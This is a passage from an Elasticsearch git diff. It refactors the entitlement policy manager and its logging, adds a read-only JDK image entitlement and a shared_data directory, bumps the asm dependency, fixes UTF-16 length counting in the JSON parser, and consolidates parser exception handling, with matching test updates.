); } @@ -360,8 +359,8 @@ public void checkAllNetworkAccess(Class callerClass) { } var classEntitlements = policyManager.getEntitlements(requestingClass); - checkFlagEntitlement(classEntitlements, InboundNetworkEntitlement.class, requestingClass, callerClass); - checkFlagEntitlement(classEntitlements, OutboundNetworkEntitlement.class, requestingClass, callerClass); + checkFlagEntitlement(classEntitlements, InboundNetworkEntitlement.class, requestingClass); + checkFlagEntitlement(classEntitlements, OutboundNetworkEntitlement.class, requestingClass); } @Override @@ -378,27 +377,26 @@ public void checkWriteProperty(Class callerClass, String property) { ModuleEntitlements entitlements = policyManager.getEntitlements(requestingClass); if (entitlements.getEntitlements(WriteSystemPropertiesEntitlement.class).anyMatch(e -> e.properties().contains(property))) { - entitlements.logger() - .debug( - () -> Strings.format( - "Entitled: component [%s], module [%s], class [%s], entitlement [write_system_properties], property [%s]", - entitlements.componentName(), - PolicyCheckerImpl.getModuleName(requestingClass), - requestingClass, - property - ) - ); + PolicyManager.generalLogger.debug( + () -> Strings.format( + "Entitled: component [%s], module [%s], class [%s], entitlement [write_system_properties], property [%s]", + entitlements.componentName(), + entitlements.moduleName(), + requestingClass, + property + ) + ); return; } notEntitled( Strings.format( "component [%s], module [%s], class [%s], entitlement [write_system_properties], property [%s]", entitlements.componentName(), - PolicyCheckerImpl.getModuleName(requestingClass), + entitlements.moduleName(), requestingClass, property ), - callerClass, + requestingClass, entitlements ); } @@ -439,39 +437,37 @@ Optional findRequestingFrame(Stream entitlementClass, - Class requestingClass, - Class callerClass + Class requestingClass ) { if (classEntitlements.hasEntitlement(entitlementClass) == false) { notEntitled( Strings.format( "component [%s], module [%s], class [%s], entitlement [%s]", classEntitlements.componentName(), - PolicyCheckerImpl.getModuleName(requestingClass), + classEntitlements.moduleName(), requestingClass, PolicyParser.buildEntitlementNameFromClass(entitlementClass) ), - callerClass, + requestingClass, classEntitlements ); } - classEntitlements.logger() - .debug( - () -> Strings.format( - "Entitled: component [%s], module [%s], class [%s], entitlement [%s]", - classEntitlements.componentName(), - PolicyCheckerImpl.getModuleName(requestingClass), - requestingClass, - PolicyParser.buildEntitlementNameFromClass(entitlementClass) - ) - ); + PolicyManager.generalLogger.debug( + () -> Strings.format( + "Entitled: component [%s], module [%s], class [%s], entitlement [%s]", + classEntitlements.componentName(), + classEntitlements.moduleName(), + requestingClass, + PolicyParser.buildEntitlementNameFromClass(entitlementClass) + ) + ); } - private void notEntitled(String message, Class callerClass, ModuleEntitlements entitlements) { + private void notEntitled(String message, Class requestingClass, ModuleEntitlements entitlements) { var exception = new NotEntitledException(message); // Don't emit a log for suppressed packages, e.g. packages containing self tests - if (suppressFailureLogPackages.contains(callerClass.getPackage()) == false) { - entitlements.logger().warn("Not entitled: {}", message, exception); + if (suppressFailureLogPackages.contains(requestingClass.getPackage()) == false) { + entitlements.logger(requestingClass).warn("Not entitled: {}", message, exception); } throw exception; } @@ -482,7 +478,7 @@ public void checkEntitlementPresent(Class callerClass, Class callerClass, URL url) { if (jarFileUrl == null || handleNetworkOrFileUrlCheck(callerClass, jarFileUrl) == false) { checkUnsupportedURLProtocolConnection(callerClass, "jar with unsupported inner protocol"); } + } else if (isJrtUrl(url)) { + checkEntitlementPresent(callerClass, ReadJdkImageEntitlement.class); } else { checkUnsupportedURLProtocolConnection(callerClass, url.getProtocol()); } @@ -565,6 +563,10 @@ private static boolean isJarUrl(java.net.URL url) { return "jar".equals(url.getProtocol()); } + private static boolean isJrtUrl(java.net.URL url) { + return "jrt".equals(url.getProtocol()); + } + // We have to use class names for sun.net.www classes as java.base does not export them private static final List ADDITIONAL_NETWORK_URL_CONNECT_CLASS_NAMES = List.of( "sun.net.www.protocol.ftp.FtpURLConnection", diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyManager.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyManager.java index d05d9ad5858cd..3c5948d7824b7 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyManager.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/PolicyManager.java @@ -22,9 +22,11 @@ import java.nio.file.Paths; import java.util.ArrayList; import java.util.Collection; +import java.util.Collections; import java.util.HashSet; import java.util.List; import java.util.Map; +import java.util.Objects; import java.util.Set; import java.util.concurrent.ConcurrentHashMap; import java.util.function.Function; @@ -52,7 +54,7 @@ public class PolicyManager { */ static final Logger generalLogger = LogManager.getLogger(PolicyManager.class); - static final Set MODULES_EXCLUDED_FROM_SYSTEM_MODULES = Set.of("java.desktop"); + static final Set MODULES_EXCLUDED_FROM_SYSTEM_MODULES = Set.of("java.desktop", "java.xml"); /** * Identifies a particular entitlement {@link Scope} within a {@link Policy}. @@ -118,11 +120,11 @@ public enum ComponentKind { * * @param componentName the plugin name or else one of the special component names like "(server)". */ - record ModuleEntitlements( + protected record ModuleEntitlements( String componentName, + String moduleName, Map, List> entitlementsByType, - FileAccessTree fileAccess, - Logger logger + FileAccessTree fileAccess ) { public ModuleEntitlements { @@ -140,6 +142,12 @@ public Stream getEntitlements(Class entitlementCla } return entitlements.stream().map(entitlementClass::cast); } + + Logger logger(Class requestingClass) { + var packageName = requestingClass.getPackageName(); + var loggerSuffix = "." + componentName + "." + ((moduleName == null) ? ALL_UNNAMED : moduleName) + "." + packageName; + return LogManager.getLogger(PolicyManager.class.getName() + loggerSuffix); + } } private FileAccessTree getDefaultFileAccess(Collection componentPaths) { @@ -148,7 +156,7 @@ private FileAccessTree getDefaultFileAccess(Collection componentPaths) { // pkg private for testing ModuleEntitlements defaultEntitlements(String componentName, Collection componentPaths, String moduleName) { - return new ModuleEntitlements(componentName, Map.of(), getDefaultFileAccess(componentPaths), getLogger(componentName, moduleName)); + return new ModuleEntitlements(componentName, moduleName, Map.of(), getDefaultFileAccess(componentPaths)); } // pkg private for testing @@ -166,9 +174,9 @@ ModuleEntitlements policyEntitlements( } return new ModuleEntitlements( componentName, + moduleName, entitlements.stream().collect(groupingBy(Entitlement::getClass)), - FileAccessTree.of(componentName, moduleName, filesEntitlement, pathLookup, componentPaths, exclusivePaths), - getLogger(componentName, moduleName) + FileAccessTree.of(componentName, moduleName, filesEntitlement, pathLookup, componentPaths, exclusivePaths) ); } @@ -209,7 +217,7 @@ private static Set findSystemLayerModules() { .filter(m -> SYSTEM_LAYER_MODULES.contains(m) == false) .collect(Collectors.toUnmodifiableSet()); - private final Map> pluginSourcePaths; + private final Function> pluginSourcePathsResolver; /** * Paths that are only allowed for a single module. Used to generate @@ -223,7 +231,7 @@ public PolicyManager( List apmAgentEntitlements, Map pluginPolicies, Function, PolicyScope> scopeResolver, - Map> pluginSourcePaths, + Function> pluginSourcePathsResolver, PathLookup pathLookup ) { this.serverEntitlements = buildScopeEntitlementsMap(requireNonNull(serverPolicy)); @@ -232,7 +240,7 @@ public PolicyManager( .stream() .collect(toUnmodifiableMap(Map.Entry::getKey, e -> buildScopeEntitlementsMap(e.getValue()))); this.scopeResolver = scopeResolver; - this.pluginSourcePaths = pluginSourcePaths; + this.pluginSourcePathsResolver = pluginSourcePathsResolver; this.pathLookup = requireNonNull(pathLookup); List exclusiveFileEntitlements = new ArrayList<>(); @@ -278,26 +286,11 @@ private static void validateEntitlementsPerModule( } } - private static Logger getLogger(String componentName, String moduleName) { - var loggerSuffix = "." + componentName + "." + ((moduleName == null) ? ALL_UNNAMED : moduleName); - return MODULE_LOGGERS.computeIfAbsent(PolicyManager.class.getName() + loggerSuffix, LogManager::getLogger); - } - - /** - * We want to use the same {@link Logger} object for a given name, because we want {@link ModuleEntitlements} - * {@code equals} and {@code hashCode} to work. - *

- * This would not be required if LogManager - * memoized the loggers, - * but here we are. - */ - private static final ConcurrentHashMap MODULE_LOGGERS = new ConcurrentHashMap<>(); - - ModuleEntitlements getEntitlements(Class requestingClass) { + protected ModuleEntitlements getEntitlements(Class requestingClass) { return moduleEntitlementsMap.computeIfAbsent(requestingClass.getModule(), m -> computeEntitlements(requestingClass)); } - private ModuleEntitlements computeEntitlements(Class requestingClass) { + protected final ModuleEntitlements computeEntitlements(Class requestingClass) { var policyScope = scopeResolver.apply(requestingClass); var componentName = policyScope.componentName(); var moduleName = policyScope.moduleName(); @@ -326,7 +319,10 @@ private ModuleEntitlements computeEntitlements(Class requestingClass) { default -> { assert policyScope.kind() == PLUGIN; var pluginEntitlements = pluginsEntitlements.get(componentName); - Collection componentPaths = pluginSourcePaths.getOrDefault(componentName, List.of()); + Collection componentPaths = Objects.requireNonNullElse( + pluginSourcePathsResolver.apply(componentName), + Collections.emptyList() + ); if (pluginEntitlements == null) { return defaultEntitlements(componentName, componentPaths, moduleName); } else { @@ -336,8 +332,7 @@ private ModuleEntitlements computeEntitlements(Class requestingClass) { } } - // pkg private for testing - static Collection getComponentPathsFromClass(Class requestingClass) { + protected Collection getComponentPathsFromClass(Class requestingClass) { var codeSource = requestingClass.getProtectionDomain().getCodeSource(); if (codeSource == null) { return List.of(); @@ -372,9 +367,7 @@ private ModuleEntitlements getModuleScopeEntitlements( * @return true if permission is granted regardless of the entitlement */ boolean isTriviallyAllowed(Class requestingClass) { - if (generalLogger.isTraceEnabled()) { - generalLogger.trace("Stack trace for upcoming trivially-allowed check", new Exception()); - } + // note: do not log exceptions in here, this could interfere with loading of additionally necessary classes such as ThrowableProxy if (requestingClass == null) { generalLogger.debug("Entitlement trivially allowed: no caller frames outside the entitlement library"); return true; diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlement.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlement.java index 872a083a76ba6..cc9ef9d263dd1 100644 --- a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlement.java +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlement.java @@ -182,8 +182,9 @@ private static BaseDir parseBaseDir(String baseDir) { case "config" -> BaseDir.CONFIG; case "data" -> BaseDir.DATA; case "home" -> BaseDir.USER_HOME; + case "shared_data" -> BaseDir.SHARED_DATA; // it would be nice to limit this to just ES modules, but we don't have a way to plumb that through to here - // however, we still don't document in the error case below that shared_repo is valid + // however, we still don't document in the error case below that shared_repo and shared_data is valid case "shared_repo" -> BaseDir.SHARED_REPO; default -> throw new PolicyValidationException( "invalid relative directory: " + baseDir + ", valid values: [config, data, home]" diff --git a/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/entitlements/ReadJdkImageEntitlement.java b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/entitlements/ReadJdkImageEntitlement.java new file mode 100644 index 0000000000000..fa13203204c30 --- /dev/null +++ b/libs/entitlement/src/main/java/org/elasticsearch/entitlement/runtime/policy/entitlements/ReadJdkImageEntitlement.java @@ -0,0 +1,19 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.entitlement.runtime.policy.entitlements; + +/** + * Internal entitlement to read code from the jdk. + * + * Concretely this means the code can open jrt urls. Since the java + * runtime images (jrt) are read only, this implicitly only allows + * reading those urls. + */ +public class ReadJdkImageEntitlement implements Entitlement {} diff --git a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/bootstrap/FilesEntitlementsValidationTests.java b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/bootstrap/FilesEntitlementsValidationTests.java index 7c4a14dd44cab..07631e7dbf5d6 100644 --- a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/bootstrap/FilesEntitlementsValidationTests.java +++ b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/bootstrap/FilesEntitlementsValidationTests.java @@ -48,6 +48,7 @@ public static void beforeClass() { testBaseDir.resolve("user/home"), TEST_CONFIG_DIR, new Path[] { testBaseDir.resolve("data1"), testBaseDir.resolve("data2") }, + Path.of("/shareddata"), new Path[] { testBaseDir.resolve("shared1"), testBaseDir.resolve("shared2") }, TEST_LIBS_DIR, testBaseDir.resolve("modules"), diff --git a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/FileAccessTreeTests.java b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/FileAccessTreeTests.java index 9307f89b4d0d3..5f5378b5e1fe9 100644 --- a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/FileAccessTreeTests.java +++ b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/FileAccessTreeTests.java @@ -59,6 +59,7 @@ private static Path path(String s) { Path.of("/home"), Path.of("/config"), new Path[] { Path.of("/data1"), Path.of("/data2") }, + Path.of("/shareddata"), new Path[] { Path.of("/shared1"), Path.of("/shared2") }, Path.of("/lib"), Path.of("/modules"), diff --git a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/PolicyManagerTests.java b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/PolicyManagerTests.java index a8e66ffae0feb..29678d14fc507 100644 --- a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/PolicyManagerTests.java +++ b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/PolicyManagerTests.java @@ -33,6 +33,7 @@ import java.net.URLClassLoader; import java.nio.file.Path; import java.util.Collection; +import java.util.Collections; import java.util.List; import java.util.Map; import java.util.Set; @@ -70,6 +71,7 @@ public static void beforeClass() { baseDir.resolve("/user/home"), baseDir.resolve("/config"), new Path[] { baseDir.resolve("/data1/"), baseDir.resolve("/data2") }, + Path.of("/shareddata"), new Path[] { baseDir.resolve("/shared1"), baseDir.resolve("/shared2") }, baseDir.resolve("/lib"), baseDir.resolve("/modules"), @@ -89,16 +91,16 @@ public void testGetEntitlements() { AtomicReference policyScope = new AtomicReference<>(); // A common policy with a variety of entitlements to test - Collection thisSourcePaths = PolicyManager.getComponentPathsFromClass(getClass()); var plugin1SourcePaths = List.of(Path.of("modules", "plugin1")); var policyManager = new PolicyManager( new Policy("server", List.of(new Scope("org.example.httpclient", List.of(new OutboundNetworkEntitlement())))), List.of(), Map.of("plugin1", new Policy("plugin1", List.of(new Scope("plugin.module1", List.of(new ExitVMEntitlement()))))), c -> policyScope.get(), - Map.of("plugin1", plugin1SourcePaths), + Map.of("plugin1", plugin1SourcePaths)::get, TEST_PATH_LOOKUP ); + Collection thisSourcePaths = policyManager.getComponentPathsFromClass(getClass()); // "Unspecified" below means that the module is not named in the policy @@ -170,7 +172,7 @@ public void testAgentsEntitlements() throws IOException, ClassNotFoundException c -> c.getPackageName().startsWith(TEST_AGENTS_PACKAGE_NAME) ? PolicyScope.apmAgent("test.agent.module") : PolicyScope.plugin("test", "test.plugin.module"), - Map.of(), + name -> Collections.emptyList(), TEST_PATH_LOOKUP ); ModuleEntitlements agentsEntitlements = policyManager.getEntitlements(TestAgent.class); @@ -197,7 +199,7 @@ public void testDuplicateEntitlements() { List.of(), Map.of(), c -> PolicyScope.plugin("test", moduleName(c)), - Map.of(), + name -> Collections.emptyList(), TEST_PATH_LOOKUP ) ); @@ -213,7 +215,7 @@ public void testDuplicateEntitlements() { List.of(new CreateClassLoaderEntitlement(), new CreateClassLoaderEntitlement()), Map.of(), c -> PolicyScope.plugin("test", moduleName(c)), - Map.of(), + name -> Collections.emptyList(), TEST_PATH_LOOKUP ) ); @@ -249,7 +251,7 @@ public void testDuplicateEntitlements() { ) ), c -> PolicyScope.plugin("plugin1", moduleName(c)), - Map.of("plugin1", List.of(Path.of("modules", "plugin1"))), + Map.of("plugin1", List.of(Path.of("modules", "plugin1")))::get, TEST_PATH_LOOKUP ) ); @@ -299,7 +301,7 @@ public void testFilesEntitlementsWithExclusive() { ) ), c -> PolicyScope.plugin("", moduleName(c)), - Map.of("plugin1", List.of(Path.of("modules", "plugin1")), "plugin2", List.of(Path.of("modules", "plugin2"))), + Map.of("plugin1", List.of(Path.of("modules", "plugin1")), "plugin2", List.of(Path.of("modules", "plugin2")))::get, TEST_PATH_LOOKUP ) ); @@ -350,7 +352,7 @@ public void testFilesEntitlementsWithExclusive() { ) ), c -> PolicyScope.plugin("", moduleName(c)), - Map.of(), + name -> Collections.emptyList(), TEST_PATH_LOOKUP ) ); diff --git a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlementTests.java b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlementTests.java index 84c4833ca6aae..d6f85eb4f069a 100644 --- a/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlementTests.java +++ b/libs/entitlement/src/test/java/org/elasticsearch/entitlement/runtime/policy/entitlements/FilesEntitlementTests.java @@ -47,6 +47,7 @@ public static void setupRoot() { Path.of("/home"), Path.of("/config"), new Path[] { Path.of("/data1"), Path.of("/data2") }, + Path.of("/shareddata"), new Path[] { Path.of("/shared1"), Path.of("/shared2") }, Path.of("/lib"), Path.of("/modules"), diff --git a/libs/plugin-scanner/build.gradle b/libs/plugin-scanner/build.gradle index 44e6853140a5b..5ec59ad7715a9 100644 --- a/libs/plugin-scanner/build.gradle +++ b/libs/plugin-scanner/build.gradle @@ -20,8 +20,8 @@ dependencies { api project(':libs:plugin-api') api project(":libs:x-content") - api 'org.ow2.asm:asm:9.7.1' - api 'org.ow2.asm:asm-tree:9.7.1' + api 'org.ow2.asm:asm:9.8' + api 'org.ow2.asm:asm-tree:9.8' testImplementation "junit:junit:${versions.junit}" testImplementation(project(":test:framework")) { diff --git a/libs/simdvec/src/main21/java/org/elasticsearch/simdvec/internal/vectorization/ESVectorizationProvider.java b/libs/simdvec/src/main21/java/org/elasticsearch/simdvec/internal/vectorization/ESVectorizationProvider.java index 4708a052b05db..f67a905f74bc9 100644 --- a/libs/simdvec/src/main21/java/org/elasticsearch/simdvec/internal/vectorization/ESVectorizationProvider.java +++ b/libs/simdvec/src/main21/java/org/elasticsearch/simdvec/internal/vectorization/ESVectorizationProvider.java @@ -46,7 +46,7 @@ public static ESVectorizationProvider getInstance() { static ESVectorizationProvider lookup(boolean testMode) { final int runtimeVersion = Runtime.version().feature(); assert runtimeVersion >= 21; - if (runtimeVersion <= 24) { + if (runtimeVersion <= 25) { // only use vector module with Hotspot VM if (Constants.IS_HOTSPOT_VM == false) { logger.warn("Java runtime is not using Hotspot VM; Java vector incubator API can't be enabled."); diff --git a/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParser.java b/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParser.java index 0491efcea0a0f..c4a9823d68ecf 100644 --- a/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParser.java +++ b/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParser.java @@ -112,7 +112,8 @@ protected Text _finishAndReturnText() throws IOException { return null; } ptr += bytesToSkip; - ++stringLength; + // Code points that require 4 bytes in UTF-8 will use 2 chars in UTF-16. + stringLength += (bytesToSkip == 4 ? 2 : 1); } default -> { return null; diff --git a/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentImpl.java b/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentImpl.java index 067985b404f3e..d109fd28dd839 100644 --- a/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentImpl.java +++ b/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentImpl.java @@ -28,6 +28,8 @@ import java.io.Reader; import java.util.Set; +import static org.elasticsearch.xcontent.provider.json.JsonXContentParser.handleParserException; + /** * A JSON based content implementation using Jackson. */ @@ -95,21 +97,37 @@ private XContentParser createParser(XContentParserConfiguration config, JsonPars @Override public XContentParser createParser(XContentParserConfiguration config, String content) throws IOException { - return createParser(config, jsonFactory.createParser(content)); + try { + return createParser(config, jsonFactory.createParser(content)); + } catch (IOException e) { + throw handleParserException(e); + } } @Override public XContentParser createParser(XContentParserConfiguration config, InputStream is) throws IOException { - return createParser(config, jsonFactory.createParser(is)); + try { + return createParser(config, jsonFactory.createParser(is)); + } catch (IOException e) { + throw handleParserException(e); + } } @Override public XContentParser createParser(XContentParserConfiguration config, byte[] data, int offset, int length) throws IOException { - return createParser(config, jsonFactory.createParser(data, offset, length)); + try { + return createParser(config, jsonFactory.createParser(data, offset, length)); + } catch (IOException e) { + throw handleParserException(e); + } } @Override public XContentParser createParser(XContentParserConfiguration config, Reader reader) throws IOException { - return createParser(config, jsonFactory.createParser(reader)); + try { + return createParser(config, jsonFactory.createParser(reader)); + } catch (IOException e) { + throw handleParserException(e); + } } } diff --git a/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentParser.java b/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentParser.java index 3471fd362f88e..9530627157683 100644 --- a/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentParser.java +++ b/libs/x-content/impl/src/main/java/org/elasticsearch/xcontent/provider/json/JsonXContentParser.java @@ -15,6 +15,7 @@ import com.fasterxml.jackson.core.JsonProcessingException; import com.fasterxml.jackson.core.JsonToken; import com.fasterxml.jackson.core.exc.InputCoercionException; +import com.fasterxml.jackson.core.exc.StreamConstraintsException; import com.fasterxml.jackson.core.io.JsonEOFException; import org.elasticsearch.core.IOUtils; @@ -28,6 +29,7 @@ import org.elasticsearch.xcontent.provider.XContentParserConfigurationImpl; import org.elasticsearch.xcontent.support.AbstractXContentParser; +import java.io.CharConversionException; import java.io.IOException; import java.nio.CharBuffer; @@ -50,20 +52,42 @@ public void allowDuplicateKeys(boolean allowDuplicateKeys) { parser.configure(JsonParser.Feature.STRICT_DUPLICATE_DETECTION, allowDuplicateKeys == false); } - private static XContentParseException newXContentParseException(JsonProcessingException e) { + private static XContentLocation getLocation(JsonProcessingException e) { JsonLocation loc = e.getLocation(); - throw new XContentParseException(new XContentLocation(loc.getLineNr(), loc.getColumnNr()), e.getMessage(), e); + if (loc != null) { + return new XContentLocation(loc.getLineNr(), loc.getColumnNr()); + } else { + return null; + } + } + + private static XContentParseException newXContentParseException(JsonProcessingException e) { + return new XContentParseException(getLocation(e), e.getMessage(), e); + } + + /** + * Handle parser exception depending on type. + * This converts known exceptions to XContentParseException and rethrows them. + */ + static IOException handleParserException(IOException e) throws IOException { + switch (e) { + case JsonEOFException eof -> throw new XContentEOFException(getLocation(eof), "Unexpected end of file", e); + case JsonParseException pe -> throw newXContentParseException(pe); + case InputCoercionException ice -> throw newXContentParseException(ice); + case CharConversionException cce -> throw new XContentParseException(null, cce.getMessage(), cce); + case StreamConstraintsException sce -> throw newXContentParseException(sce); + default -> { + return e; + } + } } @Override public Token nextToken() throws IOException { try { return convertToken(parser.nextToken()); - } catch (JsonEOFException e) { - JsonLocation location = e.getLocation(); - throw new XContentEOFException(new XContentLocation(location.getLineNr(), location.getColumnNr()), "Unexpected end of file", e); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -71,8 +95,8 @@ public Token nextToken() throws IOException { public String nextFieldName() throws IOException { try { return parser.nextFieldName(); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -100,8 +124,8 @@ public String currentName() throws IOException { protected boolean doBooleanValue() throws IOException { try { return parser.getBooleanValue(); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -112,8 +136,8 @@ public String text() throws IOException { } try { return parser.getText(); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -139,8 +163,8 @@ private void throwOnNoText() { public CharBuffer charBuffer() throws IOException { try { return CharBuffer.wrap(parser.getTextCharacters(), parser.getTextOffset(), parser.getTextLength()); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -189,8 +213,8 @@ public boolean hasTextCharacters() { public char[] textCharacters() throws IOException { try { return parser.getTextCharacters(); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -198,8 +222,8 @@ public char[] textCharacters() throws IOException { public int textLength() throws IOException { try { return parser.getTextLength(); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -207,8 +231,8 @@ public int textLength() throws IOException { public int textOffset() throws IOException { try { return parser.getTextOffset(); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -216,8 +240,8 @@ public int textOffset() throws IOException { public Number numberValue() throws IOException { try { return parser.getNumberValue(); - } catch (InputCoercionException | JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -225,8 +249,8 @@ public Number numberValue() throws IOException { public short doShortValue() throws IOException { try { return parser.getShortValue(); - } catch (InputCoercionException | JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -234,8 +258,8 @@ public short doShortValue() throws IOException { public int doIntValue() throws IOException { try { return parser.getIntValue(); - } catch (InputCoercionException | JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -243,8 +267,8 @@ public int doIntValue() throws IOException { public long doLongValue() throws IOException { try { return parser.getLongValue(); - } catch (InputCoercionException | JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -252,8 +276,8 @@ public long doLongValue() throws IOException { public float doFloatValue() throws IOException { try { return parser.getFloatValue(); - } catch (InputCoercionException | JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -261,8 +285,8 @@ public float doFloatValue() throws IOException { public double doDoubleValue() throws IOException { try { return parser.getDoubleValue(); - } catch (InputCoercionException | JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -270,8 +294,8 @@ public double doDoubleValue() throws IOException { public byte[] binaryValue() throws IOException { try { return parser.getBinaryValue(); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } diff --git a/libs/x-content/impl/src/test/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParserTests.java b/libs/x-content/impl/src/test/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParserTests.java index df52eeb3632ad..de74def939723 100644 --- a/libs/x-content/impl/src/test/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParserTests.java +++ b/libs/x-content/impl/src/test/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParserTests.java @@ -76,6 +76,18 @@ public void testGetValueAsText() throws IOException { assertThat(parser.getValueAsString(), Matchers.equalTo("bår")); }); + testParseJson("{\"foo\": \"\uD83D\uDE0A\"}", parser -> { + assertThat(parser.nextToken(), Matchers.equalTo(JsonToken.START_OBJECT)); + assertThat(parser.nextFieldName(), Matchers.equalTo("foo")); + assertThat(parser.nextValue(), Matchers.equalTo(JsonToken.VALUE_STRING)); + + var text = parser.getValueAsText(); + assertThat(text, Matchers.notNullValue()); + var bytes = text.bytes(); + assertTextRef(bytes, "\uD83D\uDE0A"); + assertThat(text.stringLength(), Matchers.equalTo(2)); + }); + testParseJson("{\"foo\": \"bår\"}", parser -> { assertThat(parser.nextToken(), Matchers.equalTo(JsonToken.START_OBJECT)); assertThat(parser.nextFieldName(), Matchers.equalTo("foo")); @@ -143,12 +155,9 @@ private record TestInput(String input, String result, boolean supportsOptimized) new TestInput("\\/", "/", true), new TestInput("\\\\", "\\", true) }; - private int randomCodepoint(boolean includeAscii) { + private int randomCodepointIncludeAscii() { while (true) { char val = Character.toChars(randomInt(0xFFFF))[0]; - if (val <= 0x7f && includeAscii == false) { - continue; - } if (val >= Character.MIN_SURROGATE && val <= Character.MAX_SURROGATE) { continue; } @@ -156,6 +165,27 @@ private int randomCodepoint(boolean includeAscii) { } } + private int randomCodepointIncludeOutsideBMP(int remainingLength) { + while (true) { + int codePoint = randomInt(0x10FFFF); + char[] val = Character.toChars(codePoint); + // Don't include ascii + if (val.length == 1 && val[0] <= 0x7F) { + continue; + } + boolean surrogate = val[0] >= Character.MIN_SURROGATE && val[0] <= Character.MAX_SURROGATE; + // Single surrogate is invalid + if (val.length == 1 && surrogate) { + continue; + } + // Not enough remaining space for a surrogate pair + if (remainingLength < 2 && surrogate) { + continue; + } + return codePoint; + } + } + private TestInput buildRandomInput(int length) { StringBuilder input = new StringBuilder(length); StringBuilder result = new StringBuilder(length); @@ -171,13 +201,14 @@ private TestInput buildRandomInput(int length) { doesSupportOptimized = doesSupportOptimized && escape.supportsOptimized(); } case 1 -> { - int value = randomCodepoint(true); + int value = randomCodepointIncludeAscii(); input.append(String.format(Locale.ENGLISH, "\\u%04x", value)); result.append(Character.toChars(value)); doesSupportOptimized = false; } default -> { - var value = Character.toChars(randomCodepoint(false)); + var remainingLength = length - i; + var value = Character.toChars(randomCodepointIncludeOutsideBMP(remainingLength)); input.append(value); result.append(value); } @@ -222,7 +253,9 @@ public void testGetValueRandomized() throws IOException { String currVal = inputs[i].result(); if (inputs[i].supportsOptimized()) { - 